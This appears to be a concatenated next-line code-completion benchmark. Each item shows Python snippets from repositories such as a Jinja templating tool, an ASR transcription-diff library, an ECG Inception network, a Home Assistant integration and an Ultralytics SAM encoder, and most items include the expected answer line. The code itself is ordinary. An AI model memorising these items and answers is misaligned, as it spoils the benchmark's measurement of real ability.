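print(WorkspaceDemo('Azure') in [WorkspaceDemo.AWS, WorkspaceDemo.AZURE])  # True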
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Infineon/pharaoh-dev
# Path: src/pharaoh/templating/second_level/env_filters.py
DEFAULT = object()
def required(value):
def rep(value) -> str:
def or_default(value, default):
def oc_resolve(value: omegaconf.DictConfig):
def oc_get(cfg: omegaconf.DictConfig, key, default=DEFAULT):
def exists(path: str) -> bool:
def to_path(path: str) -> Path:
def hasattr_(obj, name):
def md2html(text):
# Path: src/pharaoh/templating/second_level/env_globals.py
def raise_helper(msg):
def heading(text: str, level: int) -> str:
def rand_id(chars: int | None = None) -> str:
def read_text(file) -> str:
def hrule():
def fglob(pattern: str, root: str = ".") -> list[Path]:
def assert_true(statement: bool, message: str = ""):
# Path: src/pharaoh/templating/second_level/env_tests.py
# Path: src/pharaoh/templating/second_level/util.py
def asset_rel_path_from_build(sphinx_app: PharaohSphinx, template_file: Path, asset: Asset):
asset.copy_to(sphinx_app.assets_dir)
return (
Path(os.path.relpath(sphinx_app.confdir, os.path.dirname(template_file)))
/ sphinx_app.assets_dir.name
/ asset.assetfile.name
).as_posix()
# Path: src/pharaoh/templating/second_level/util.py
def asset_rel_path_from_project(project: PharaohProject, asset: Asset):
return "/" + asset.assetfile.relative_to(project.asset_build_dir.parent).as_posix()
# Path: src/pharaoh/templating/second_level/template_env.py
from __future__ import annotations
import copy
import functools
import os
import pprint
import shutil
import uuid
import jinja2
import omegaconf
import pharaoh.project
from functools import partial
from pathlib import Path
from types import ModuleType
from typing import TYPE_CHECKING, Callable
from jinja2_git import GitExtension
from pharaoh.log import log
from pharaoh.util.contextlib_chdir import chdir
from .env_filters import env_filters
from .env_globals import env_globals
from .env_tests import env_tests
from .util import asset_rel_path_from_build, asset_rel_path_from_project
from pharaoh.plugins.plugin_manager import PM
if TYPE_CHECKING:
    from collections.abc import Iterator
    from sphinx.config import Config
    from pharaoh.sphinx_app import PharaohSphinx
class PharaohFileSystemLoader(jinja2.loaders.FileSystemLoader):
def get_source(self, environment: jinja2.Environment, template: str) -> tuple[str, str, Callable[[], bool]]:
# Overwrite to support absolute filenames as well as relative ones that have to be looked up in the search paths
for searchpath in self.searchpath:
if "<>" in template: # See PharaohTemplateEnv.join_path
parent, template_ = template.rsplit("<>", 1)
template_path = Path(parent) / template_
if template_path.is_absolute() and template_path.exists():
filename = template_path.as_posix()
else:
pieces = jinja2.loaders.split_template_path(template_)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
else:
pieces = jinja2.loaders.split_template_path(template)
filename = jinja2.loaders.posixpath.join(searchpath, *pieces)
# Original code starts from here
f = jinja2.loaders.open_if_exists(filename)
if f is None:
continue
try:
contents = f.read().decode(self.encoding)
finally:
f.close()
def up_to_date() -> bool:
return False
# Use normpath to convert Windows altsep to sep.
return contents, os.path.normpath(filename), up_to_date
raise jinja2.TemplateNotFound(template)
class PharaohTemplate(jinja2.Template):
def render(self, *args, **kwargs) -> str:
return super().render(*args, **kwargs)
class PharaohTemplateEnv(jinja2.Environment):
template_class = PharaohTemplate
def __init__(self):
super().__init__(
trim_blocks=True,
lstrip_blocks=True,
keep_trailing_newline=True,
extensions=["jinja2_ansible_filters.AnsibleCoreFiltersExtension"],
)
self.default_context: dict = {
"project": {}, # Project related context
"local": {}, # Discovered content of context files next to the source file
"assets": {}, # Discovered content of asset files registered via register_templating_context function
"config": None, # Content of conf.py (Sphinx Config object)
"user": None, # Content of user given dict "pharaoh_jinja_context" in conf.py
}
self.local_context_file_cache: dict[Path, ModuleType] = {}
self.sphinx_app: PharaohSphinx | None = None
self.globals.update(env_globals)
| self.filters.update(env_filters) |
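The globals/filters wiring above is standard Jinja2; a minimal standalone environment showing the same update pattern with throwaway callables:

import jinja2

env = jinja2.Environment()
env.globals.update({"hrule": lambda: "-" * 20})
env.filters.update({"shout": lambda s: s.upper() + "!"})

print(env.from_string("{{ hrule() }} {{ 'hello' | shout }}").render())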
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: CorentinJ/transcription-diff
# Path: transcription_diff/text_normalization.py
def normalize_text(raw_text: str, lang_id: str, fault_tolerant=False) -> Tuple[str, SliceMap]:
"""
:param fault_tolerant: issues arising in cleaning operations will not raise an exception if True. The cleaning
and/or mapping may then be incorrect.
:return: the tuple
- clean_text: the cleaned text
- raw2clean: the mapping from raw text to clean text
"""
# Define the ops to apply
text_cleaning_ops = [standardize_characters]
if Language.get(lang_id).language == "en":
text_cleaning_ops.extend([expand_abbreviations, normalize_numbers])
text_cleaning_ops.extend([keep_pronounced_only, collapse_whitespace])
return apply_text_transforms_with_mapping(raw_text, text_cleaning_ops, fault_tolerant)
# Path: transcription_diff/whisper_asr.py
@overload
def whisper_asr(
wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Tuple[str, str]: ...
# Path: transcription_diff/text_diff.py
import logging
import numpy as np
from dataclasses import dataclass
from pathlib import Path
from typing import List, Iterable, overload, Union
from minineedle import needle
from transcription_diff.text_normalization import normalize_text
from transcription_diff.whisper_asr import whisper_asr
from colorama import Fore as colors
@dataclass
class TextDiffRegion:
reference_text: str
compared_text: str
pronunciation_match: bool
def clean_text_diff(ref_text: str, compared: str) -> List[TextDiffRegion]:
alignment = needle.NeedlemanWunsch(ref_text.split(" "), compared.split(" "))
alignment.align()
# Arrange
regions = []
for ref_word, compared_word in zip(*alignment.get_aligned_sequences()):
regions.append(TextDiffRegion(
ref_word if isinstance(ref_word, str) else "",
compared_word if isinstance(compared_word, str) else "",
pronunciation_match=(ref_word == compared_word)
))
# Re-add the spaces between words, and prefer to add them on identical regions rather than non-identical ones
for text_attr in ("reference_text", "compared_text"):
last_word_region = None
for region in regions:
if not getattr(region, text_attr):
continue
if last_word_region:
if last_word_region.pronunciation_match:
setattr(last_word_region, text_attr, getattr(last_word_region, text_attr) + " ")
else:
setattr(region, text_attr, " " + getattr(region, text_attr))
last_word_region = region
# Compress
new_regions = []
for region in regions:
if new_regions and (new_regions[-1].pronunciation_match == region.pronunciation_match):
new_regions[-1].reference_text += region.reference_text
new_regions[-1].compared_text += region.compared_text
else:
new_regions.append(region)
return new_regions
def text_diff(
reference_texts: Iterable[str], compared_texts: Iterable[str], lang_id: str
) -> List[List[TextDiffRegion]]:
raw_refs, raw_comps = list(reference_texts), list(compared_texts)
# Normalize text down to characters that influence pronunciation only
clean_refs, raw2clean_refs = zip(*[normalize_text(raw_ref, lang_id) for raw_ref in raw_refs])
clean_comps, raw2clean_comps = zip(*[normalize_text(raw_comp, lang_id) for raw_comp in raw_comps])
# Align clean texts and isolate errors
text_diffs = [clean_text_diff(clean_ref, clean_comp) for clean_ref, clean_comp in zip(clean_refs, clean_comps)]
# Bring the regions up to the unnormalized text space
for raw_ref, raw2clean_ref, raw_comp, raw2clean_comp, clean_diff in zip(
raw_refs, raw2clean_refs, raw_comps, raw2clean_comps, text_diffs
):
clean2raw_ref = raw2clean_ref.inverse()
clean2raw_comp = raw2clean_comp.inverse()
clean_ref_pos, clean_comp_pos = 0, 0
raw_ref_pos, raw_comp_pos = 0, 0
for region in clean_diff:
# Use slicemaps to figure out which parts of the unnormalized text this region corresponds to
clean_ref_sli = slice(clean_ref_pos, clean_ref_pos + len(region.reference_text))
clean_comp_sli = slice(clean_comp_pos, clean_comp_pos + len(region.compared_text))
if region is not clean_diff[-1]:
raw_ref_sli = slice(raw_ref_pos, max(clean2raw_ref[clean_ref_sli].stop, raw_ref_pos))
raw_comp_sli = slice(raw_comp_pos, max(clean2raw_comp[clean_comp_sli].stop, raw_comp_pos))
else:
# Ensure we span the entirety of the unnormalized text, slicemaps are not guaranteed to be surjective
# Typical example: a final punctuation that is erased in text normalization.
raw_ref_sli = slice(raw_ref_pos, len(raw_ref))
raw_comp_sli = slice(raw_comp_pos, len(raw_comp))
# Modify the region in place with the unnormalized text
region.reference_text = raw_ref[raw_ref_sli]
region.compared_text = raw_comp[raw_comp_sli]
# Update the positions
clean_ref_pos = clean_ref_sli.stop
clean_comp_pos = clean_comp_sli.stop
raw_ref_pos = raw_ref_sli.stop
raw_comp_pos = raw_comp_sli.stop
return text_diffs
@overload
def transcription_diff(
text: str, wav: np.ndarray, sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], wavs: Iterable[np.ndarray], sr, *, audio_lang: str=None, whisper_model_size=2, custom_words=[],
device="cuda"
) -> List[List[TextDiffRegion]]: ...
@overload
def transcription_diff(
text: str, fpath: Union[str, Path], *, audio_lang: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> List[TextDiffRegion]: ...
@overload
def transcription_diff(
texts: List[str], fpaths: Iterable[Union[str, Path]], *, audio_lang: str=None, whisper_model_size=2,
custom_words=[], device="cuda"
) -> List[List[TextDiffRegion]]: ...
def transcription_diff(
*args, lang_id: str=None, whisper_model_size=2, custom_words=[], device="cuda"
) -> Union[List[TextDiffRegion], List[List[TextDiffRegion]]]:
# TODO: doc
# Arg parsing
texts, args = args[0], args[1:]
if single := isinstance(texts, str):
texts = [texts]
# Perform ASR
| asr_texts, lang_id = whisper_asr( |
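The word alignment inside clean_text_diff comes from minineedle's Needleman-Wunsch implementation; a standalone sketch of that call with two invented word lists (gaps come back as minineedle Gap objects rather than strings, which is why the source type-checks with isinstance):

from minineedle import needle

ref_words = "the quick brown fox".split(" ")
asr_words = "the quick red fox".split(" ")

alignment = needle.NeedlemanWunsch(ref_words, asr_words)
alignment.align()
aligned_ref, aligned_asr = alignment.get_aligned_sequences()
print(aligned_ref)
print(aligned_asr)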
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: AI4HealthUOL/ECG-MIMIC
# Path: src/clinical_ts/basic_conv1d.py
class AdaptiveConcatPool1d(nn.Module):
"Layer that concats `AdaptiveAvgPool1d` and `AdaptiveMaxPool1d`."
def __init__(self, sz=None):
"Output will be 2*sz or 2 if sz is None"
super().__init__()
sz = sz or 1
self.ap,self.mp = nn.AdaptiveAvgPool1d(sz), nn.AdaptiveMaxPool1d(sz)
def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)
# Path: src/clinical_ts/basic_conv1d.py
def create_head1d(nf, nc, lin_ftrs=None, ps=0.5, bn_final:bool=False, bn:bool=True, act="relu", concat_pooling=True):
    "Model head that takes `nf` features, runs through `lin_ftrs`, and about `nc` classes; added bn and act here"
    lin_ftrs = [2*nf if concat_pooling else nf, nc] if lin_ftrs is None else [2*nf if concat_pooling else nf] + lin_ftrs + [nc] #was [nf, 512,nc]
    ps = [ps] if not isinstance(ps,Iterable) else ps
    if len(ps)==1: ps = [ps[0]/2] * (len(lin_ftrs)-2) + ps
    actns = [nn.ReLU(inplace=True) if act=="relu" else nn.ELU(inplace=True)] * (len(lin_ftrs)-2) + [None]
    layers = [AdaptiveConcatPool1d() if concat_pooling else nn.AdaptiveAvgPool1d(1), Flatten()]
    for ni,no,p,actn in zip(lin_ftrs[:-1],lin_ftrs[1:],ps,actns):
        layers += bn_drop_lin(ni,no,bn,p,actn)
    if bn_final: layers.append(nn.BatchNorm1d(lin_ftrs[-1], momentum=0.01))  # final BN, as referenced by bn_final_head below
    return nn.Sequential(*layers)
# Path: src/clinical_ts/inception1d.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from .basic_conv1d import AdaptiveConcatPool1d,create_head1d
__all__ = ['conv', 'noop', 'InceptionBlock1d', 'Shortcut1d', 'InceptionBackbone', 'Inception1d', 'inception1d']
# Cell
def conv(in_planes, out_planes, kernel_size=3, stride=1):
"convolution with padding"
return nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=(kernel_size-1)//2, bias=False)
def noop(x): return x
# Cell
class InceptionBlock1d(nn.Module):
def __init__(self, ni, nb_filters, kss, stride=1, act='linear', bottleneck_size=32):
super().__init__()
self.bottleneck = conv(ni, bottleneck_size, 1, stride) if (bottleneck_size>0) else noop
self.convs = nn.ModuleList([conv(bottleneck_size if (bottleneck_size>0) else ni, nb_filters, ks) for ks in kss])
self.conv_bottle = nn.Sequential(nn.MaxPool1d(3, stride, padding=1), conv(ni, nb_filters, 1))
self.bn_relu = nn.Sequential(nn.BatchNorm1d((len(kss)+1)*nb_filters), nn.ReLU())
def forward(self, x):
#print("block in",x.size())
bottled = self.bottleneck(x)
out = self.bn_relu(torch.cat([c(bottled) for c in self.convs]+[self.conv_bottle(x)], dim=1))
return out
# Cell
class Shortcut1d(nn.Module):
def __init__(self, ni, nf):
super().__init__()
self.act_fn=nn.ReLU(True)
self.conv=conv(ni, nf, 1)
self.bn=nn.BatchNorm1d(nf)
def forward(self, inp, out):
#print("sk",out.size(), inp.size(), self.conv(inp).size(), self.bn(self.conv(inp)).size)
#input()
return self.act_fn(out + self.bn(self.conv(inp)))
# Cell
class InceptionBackbone(nn.Module):
def __init__(self, input_channels, kss, depth, bottleneck_size, nb_filters, use_residual):
super().__init__()
self.depth = depth
assert((depth % 3) == 0)
self.use_residual = use_residual
n_ks = len(kss) + 1
self.im = nn.ModuleList([InceptionBlock1d(input_channels if d==0 else n_ks*nb_filters,nb_filters=nb_filters,kss=kss, bottleneck_size=bottleneck_size) for d in range(depth)])
self.sk = nn.ModuleList([Shortcut1d(input_channels if d==0 else n_ks*nb_filters, n_ks*nb_filters) for d in range(depth//3)])
def forward(self, x):
input_res = x
for d in range(self.depth):
x = self.im[d](x)
if self.use_residual and d % 3 == 2:
x = (self.sk[d//3])(input_res, x)
input_res = x.clone()
return x
# Cell
class Inception1d(nn.Module):
'''inception time architecture'''
def __init__(self, num_classes=2, input_channels=8, kss=[39,19,9], depth=6, bottleneck_size=32, nb_filters=32, use_residual=True,lin_ftrs_head=None, ps_head=0.5, bn_final_head=False, bn_head=True, act_head="relu", concat_pooling=True):
super().__init__()
layers = [InceptionBackbone(input_channels=input_channels, kss=kss, depth=depth, bottleneck_size=bottleneck_size, nb_filters=nb_filters, use_residual=use_residual)]
n_ks = len(kss) + 1
#head
| head = create_head1d(n_ks*nb_filters, nc=num_classes, lin_ftrs=lin_ftrs_head, ps=ps_head, bn_final=bn_final_head, bn=bn_head, act=act_head, concat_pooling=concat_pooling) |
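A quick shape check for the padding-preserving conv the backbone relies on, assuming torch is installed; the tensor sizes are illustrative:

import torch
import torch.nn as nn

# Re-declared from above so the check runs standalone
def conv(in_planes, out_planes, kernel_size=3, stride=1):
    return nn.Conv1d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
                     padding=(kernel_size - 1) // 2, bias=False)

x = torch.randn(4, 8, 1000)      # (batch, leads, time)
print(conv(8, 32, 39)(x).shape)  # torch.Size([4, 32, 1000]), length preserved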
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: eblume/TyperAssistant
# Path: src/typerassistant/spec.py
class FunctionCall:
call_id: str
function: FunctionSpec
parameters: dict[str, Any]
def dict(self) -> dict:
return {
"call_id": self.call_id,
"function": self.function.name,
"parameters": self.parameters,
}
# Path: src/typerassistant/spec.py
class FunctionSpec:
name: str
description: str
parameters: list[ParameterSpec]
action: Callable[..., Any]
def tool(self) -> ToolAssistantToolsFunction:
return ToolAssistantToolsFunction(
type="function",
function=FunctionDefinition(
name=self.name,
description=self.description or "None",
parameters=self.json_parameters(),
),
)
def json_parameters(self) -> FunctionParameters:
# For some reason OpenAI doesn't continue to type this, but instead just provides dict[str, object].
# In any case, it's supposed to be a JSONSchema object, so we'll just do that manually for now.
# https://github.com/openai/openai-python/blob/main/src/openai/types/shared_params/function_parameters.py
parameters = {
"type": "object",
"properties": {param.name: param.dict() for param in self.parameters},
"required": [param.name for param in self.parameters if param.required],
}
# enum processing - do this in a second pass to avoid empty enums
for param in self.parameters:
if param.enum:
parameters["properties"][param.name]["enum"] = list(param.enum)
return parameters
# Path: src/typerassistant/assistant.py
import json
import time
from collections.abc import Iterable
from contextlib import redirect_stdout
from dataclasses import KW_ONLY, dataclass, field
from io import StringIO
from textwrap import shorten
from typing import Optional, Type, TypeVar
from openai import OpenAI
from openai.types.beta.assistant import Assistant as RemoteAssistant
from openai.types.beta.thread import Thread
from openai.types.beta.threads import RequiredActionFunctionToolCall
from openai.types.beta.threads.run_submit_tool_outputs_params import ToolOutput
from openai.types.beta.threads.thread_message import ThreadMessage
from rich import print
from rich.panel import Panel
from rich.prompt import Confirm
from .spec import FunctionCall, FunctionSpec
# The number of times to poll for a run to complete before giving up
MAX_RUN_ITERATIONS = 20
# The number of seconds to sleep between run iterations
RUN_ITERATION_SLEEP = 3
# The best usage guide for function calling seems to be:
# https://cookbook.openai.com/examples/how_to_call_functions_with_chat_models
AssistantT = TypeVar("AssistantT", bound="Assistant")
@dataclass
class Assistant:
"""An assistant managed remotely via OpenAI's assistant API.
This class implements the basic lifecycle of an assistant, from CRUD to running a thread. It is intended to be
subclassed to extend functionality.
"""
name: str
_: KW_ONLY
instructions: str = "The agent is a helpful assistant. Its behavior and capabilities can be extended via the 'typerassistant' python package's API."
client: OpenAI = field(default_factory=OpenAI)
replace: bool = False
_assistant: Optional[RemoteAssistant] = None
@classmethod
def from_id(cls: Type[AssistantT], assistant_id: str, client: Optional[OpenAI] = None) -> AssistantT:
"""Retrieve the assistant with the given ID from OpenAI.
This method will skip all assistant creation steps and simply use the remote definition."""
if client is None:
client = OpenAI()
assistant = client.beta.assistants.retrieve(assistant_id)
return cls(
client=client,
name=assistant.name or "Unnamed Assistant",
instructions=assistant.instructions or cls.instructions,
_assistant=assistant,
)
@property
def assistant(self) -> RemoteAssistant:
if self._assistant is None:
self._assistant = self.make_assistant(self.replace)
return self._assistant
def ask(
self,
query: str,
thread: Optional[Thread] = None,
use_commands: bool = True,
confirm_commands: bool = True,
instructions: Optional[str] = None,
) -> str:
"""Ask the assistant a question, returning the response.
This may block for the lifecycle of several API requests as well as waiting on remotely managed threads, in fact
blocking for several minutes and then succeeding is not uncommon. The caller should make arrangements for
multithreading, etc. should it be needed.
If a thread is not provided, a new one will be made.
"""
if thread is None:
thread = self.thread()
self.add_message(query, thread)
self.run_thread(thread, use_commands=use_commands, confirm_commands=confirm_commands, instructions=instructions)
messages = list(self.messages(thread))
content = messages[0].content
assert len(content) == 1
assert content[0].type == "text"
assert len(content[0].text.annotations) == 0
return content[0].text.value
| def functions(self) -> Iterable[FunctionSpec]: |
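The run lifecycle that ask() describes is bounded by MAX_RUN_ITERATIONS and RUN_ITERATION_SLEEP above; a generic polling skeleton of that pattern (check_status is a stand-in callable, not part of the TyperAssistant API):

import time

MAX_RUN_ITERATIONS = 20
RUN_ITERATION_SLEEP = 3

def wait_until_done(check_status):
    # Poll a remote run until it reports completion, or give up after the iteration cap
    for _ in range(MAX_RUN_ITERATIONS):
        if check_status() == "completed":
            return True
        time.sleep(RUN_ITERATION_SLEEP)
    return False

print(wait_until_done(lambda: "completed"))  # True on the first poll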
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Mat931/digitalstrom-homeassistant
# Path: custom_components/digitalstrom/const.py
CONF_DSUID: str = "dsuid"
# Path: custom_components/digitalstrom/const.py
DOMAIN = "digitalstrom"
# Path: custom_components/digitalstrom/entity.py
class DigitalstromEntity(Entity):
"""Define a base digitalSTROM entity."""
def __init__(self, device: DigitalstromDevice, entity_identifier: str):
"""Initialize the entity."""
self.device = device
self._attr_unique_id: str = f"{self.device.dsuid}_{entity_identifier}"
self.entity_id = f"{DOMAIN}.{self._attr_unique_id}"
self._attr_should_poll = False
self._has_state = False
@property
def device_info(self) -> DeviceInfo:
"""Return the device info."""
parent_device = (
self.device
if self.device.parent_device is None
else self.device.parent_device
)
zone_name = ""
if zone := self.device.apartment.zones.get(self.device.zone_id):
zone_name = zone.name
return DeviceInfo(
identifiers={(DOMAIN, parent_device.dsuid)},
name=parent_device.name,
manufacturer=parent_device.manufacturer,
model=parent_device.hw_info,
# sw_version=parent_device.sw_version,
via_device=(DOMAIN, parent_device.meter_dsuid),
suggested_area=zone_name,
)
@property
def available(self) -> bool:
return self.device.available
# Path: custom_components/digitalstrom/binary_sensor.py
import logging
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
BinarySensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EntityCategory
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import CONF_DSUID, DOMAIN
from .entity import DigitalstromEntity
name="Brightness",
device_class=BinarySensorDeviceClass.LIGHT,
),
3: BinarySensorEntityDescription(
key="3",
name="Presence in darkness",
device_class=BinarySensorDeviceClass.PRESENCE,
),
4: BinarySensorEntityDescription(
key="4",
name="Twilight",
device_class=BinarySensorDeviceClass.LIGHT,
),
5: BinarySensorEntityDescription(
key="5",
name="Motion",
device_class=BinarySensorDeviceClass.MOTION,
),
6: BinarySensorEntityDescription(
key="6",
name="Motion in darkness",
device_class=BinarySensorDeviceClass.MOTION,
),
7: BinarySensorEntityDescription(
key="7",
name="Smoke",
device_class=BinarySensorDeviceClass.SMOKE,
),
8: BinarySensorEntityDescription(
key="8",
name="Wind strength above limit",
device_class=BinarySensorDeviceClass.SAFETY,
),
9: BinarySensorEntityDescription(
key="9",
name="Rain",
device_class=BinarySensorDeviceClass.MOISTURE,
),
10: BinarySensorEntityDescription(
key="10",
name="Sun",
device_class=BinarySensorDeviceClass.LIGHT,
),
11: BinarySensorEntityDescription(
key="11",
name="Temperature below limit",
device_class=BinarySensorDeviceClass.COLD,
),
12: BinarySensorEntityDescription(
key="12",
name="Battery",
device_class=BinarySensorDeviceClass.BATTERY,
),
13: BinarySensorEntityDescription(
key="13",
name="Window",
device_class=BinarySensorDeviceClass.WINDOW,
),
14: BinarySensorEntityDescription(
key="14",
name="Door",
device_class=BinarySensorDeviceClass.DOOR,
),
15: BinarySensorEntityDescription(
key="15",
name="Window tilt",
device_class=BinarySensorDeviceClass.WINDOW,
),
16: BinarySensorEntityDescription(
key="16",
name="Garage door",
device_class=BinarySensorDeviceClass.GARAGE_DOOR,
),
17: BinarySensorEntityDescription(
key="17",
name="Sun protection",
device_class=BinarySensorDeviceClass.SAFETY,
),
18: BinarySensorEntityDescription(
key="18",
name="Frost",
device_class=BinarySensorDeviceClass.COLD,
),
19: BinarySensorEntityDescription(
key="19",
name="Heating system",
device_class=BinarySensorDeviceClass.HEAT,
),
20: BinarySensorEntityDescription(
key="20",
name="Warm water",
device_class=BinarySensorDeviceClass.HEAT,
),
21: BinarySensorEntityDescription(
key="21",
name="Initialization",
device_class=BinarySensorDeviceClass.RUNNING,
entity_category=EntityCategory.DIAGNOSTIC,
),
22: BinarySensorEntityDescription(
key="22",
name="Malfunction",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
23: BinarySensorEntityDescription(
key="23",
name="Service required",
device_class=BinarySensorDeviceClass.PROBLEM,
entity_category=EntityCategory.DIAGNOSTIC,
),
}
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the binary sensor platform."""
| client = hass.data[DOMAIN][config_entry.data[CONF_DSUID]]["client"] |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: mohenghui/detectAuto_v8
# Path: ultralytics/nn/modules/transformer.py
class LayerNorm2d(nn.Module):
"""
2D Layer Normalization module inspired by Detectron2 and ConvNeXt implementations.
Original implementations in
https://github.com/facebookresearch/detectron2/blob/main/detectron2/layers/batch_norm.py
and
https://github.com/facebookresearch/ConvNeXt/blob/main/models/convnext.py.
"""
def __init__(self, num_channels, eps=1e-6):
"""Initialize LayerNorm2d with the given parameters."""
super().__init__()
self.weight = nn.Parameter(torch.ones(num_channels))
self.bias = nn.Parameter(torch.zeros(num_channels))
self.eps = eps
def forward(self, x):
"""Perform forward pass for 2D layer normalization."""
u = x.mean(1, keepdim=True)
s = (x - u).pow(2).mean(1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.eps)
return self.weight[:, None, None] * x + self.bias[:, None, None]
# Path: ultralytics/nn/modules/transformer.py
class MLPBlock(nn.Module):
"""Implements a single block of a multi-layer perceptron."""
def __init__(self, embedding_dim, mlp_dim, act=nn.GELU):
"""Initialize the MLPBlock with specified embedding dimension, MLP dimension, and activation function."""
super().__init__()
self.lin1 = nn.Linear(embedding_dim, mlp_dim)
self.lin2 = nn.Linear(mlp_dim, embedding_dim)
self.act = act()
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Forward pass for the MLPBlock."""
return self.lin2(self.act(self.lin1(x)))
# Path: ultralytics/models/sam/modules/encoders.py
from typing import Any, Optional, Tuple, Type
from ultralytics.nn.modules import LayerNorm2d, MLPBlock
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# Ultralytics YOLO 🚀, AGPL-3.0 license
class ImageEncoderViT(nn.Module):
"""
An image encoder using Vision Transformer (ViT) architecture for encoding an image into a compact latent space. The
encoder takes an image, splits it into patches, and processes these patches through a series of transformer blocks.
The encoded patches are then processed through a neck to generate the final encoded representation.
This class and its supporting functions below are lightly adapted from the ViTDet backbone available at
https://github.com/facebookresearch/detectron2/blob/main/detectron2/modeling/backbone/vit.py.
Attributes:
img_size (int): Dimension of input images, assumed to be square.
patch_embed (PatchEmbed): Module for patch embedding.
pos_embed (nn.Parameter, optional): Absolute positional embedding for patches.
blocks (nn.ModuleList): List of transformer blocks for processing patch embeddings.
neck (nn.Sequential): Neck module to further process the output.
"""
def __init__(
self,
img_size: int = 1024,
patch_size: int = 16,
in_chans: int = 3,
embed_dim: int = 768,
depth: int = 12,
num_heads: int = 12,
mlp_ratio: float = 4.0,
out_chans: int = 256,
qkv_bias: bool = True,
norm_layer: Type[nn.Module] = nn.LayerNorm,
act_layer: Type[nn.Module] = nn.GELU,
use_abs_pos: bool = True,
use_rel_pos: bool = False,
rel_pos_zero_init: bool = True,
window_size: int = 0,
global_attn_indexes: Tuple[int, ...] = (),
) -> None:
"""
Args:
img_size (int): Input image size.
patch_size (int): Patch size.
in_chans (int): Number of input image channels.
embed_dim (int): Patch embedding dimension.
depth (int): Depth of ViT.
num_heads (int): Number of attention heads in each ViT block.
mlp_ratio (float): Ratio of mlp hidden dim to embedding dim.
qkv_bias (bool): If True, add a learnable bias to query, key, value.
norm_layer (nn.Module): Normalization layer.
act_layer (nn.Module): Activation layer.
use_abs_pos (bool): If True, use absolute positional embeddings.
use_rel_pos (bool): If True, add relative positional embeddings to the attention map.
rel_pos_zero_init (bool): If True, zero initialize relative positional parameters.
window_size (int): Window size for window attention blocks.
global_attn_indexes (list): Indexes for blocks using global attention.
"""
super().__init__()
self.img_size = img_size
self.patch_embed = PatchEmbed(
kernel_size=(patch_size, patch_size),
stride=(patch_size, patch_size),
in_chans=in_chans,
embed_dim=embed_dim,
)
self.pos_embed: Optional[nn.Parameter] = None
if use_abs_pos:
# Initialize absolute positional embedding with pretrain image size.
self.pos_embed = nn.Parameter(torch.zeros(1, img_size // patch_size, img_size // patch_size, embed_dim))
self.blocks = nn.ModuleList()
for i in range(depth):
block = Block(
dim=embed_dim,
num_heads=num_heads,
mlp_ratio=mlp_ratio,
qkv_bias=qkv_bias,
norm_layer=norm_layer,
act_layer=act_layer,
use_rel_pos=use_rel_pos,
rel_pos_zero_init=rel_pos_zero_init,
window_size=window_size if i not in global_attn_indexes else 0,
input_size=(img_size // patch_size, img_size // patch_size),
)
self.blocks.append(block)
self.neck = nn.Sequential(
nn.Conv2d(
embed_dim,
out_chans,
kernel_size=1,
bias=False,
),
| LayerNorm2d(out_chans), |
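As a quick sanity check on the shape bookkeeping the class docstring describes, here is illustrative arithmetic only, mirroring the default arguments above:
img_size, patch_size, embed_dim = 1024, 16, 768  # defaults from __init__ above
tokens_per_side = img_size // patch_size
print(tokens_per_side)                                   # 64 patches along each axis
print((1, tokens_per_side, tokens_per_side, embed_dim))  # pos_embed shape: (1, 64, 64, 768)
# Blocks whose index appears in global_attn_indexes get window_size=0, i.e. full
# global attention; every other block attends within local windows of window_size.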
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: i-super/Saleor
# Path: saleor/graphql/api.py
API_PATH = SimpleLazyObject(lambda: reverse("api"))
class Query(
AccountQueries,
AppQueries,
AttributeQueries,
ChannelQueries,
CheckoutQueries,
CoreQueries,
CsvQueries,
DiscountQueries,
PluginsQueries,
GiftCardQueries,
MenuQueries,
OrderQueries,
PageQueries,
PaymentQueries,
ProductQueries,
ShippingQueries,
ShopQueries,
StockQueries,
TaxQueries,
TranslationQueries,
WarehouseQueries,
WebhookQueries,
):
class Mutation(
AccountMutations,
AppMutations,
AttributeMutations,
ChannelMutations,
CheckoutMutations,
CoreMutations,
CsvMutations,
DiscountMutations,
ExternalNotificationMutations,
PluginsMutations,
GiftCardMutations,
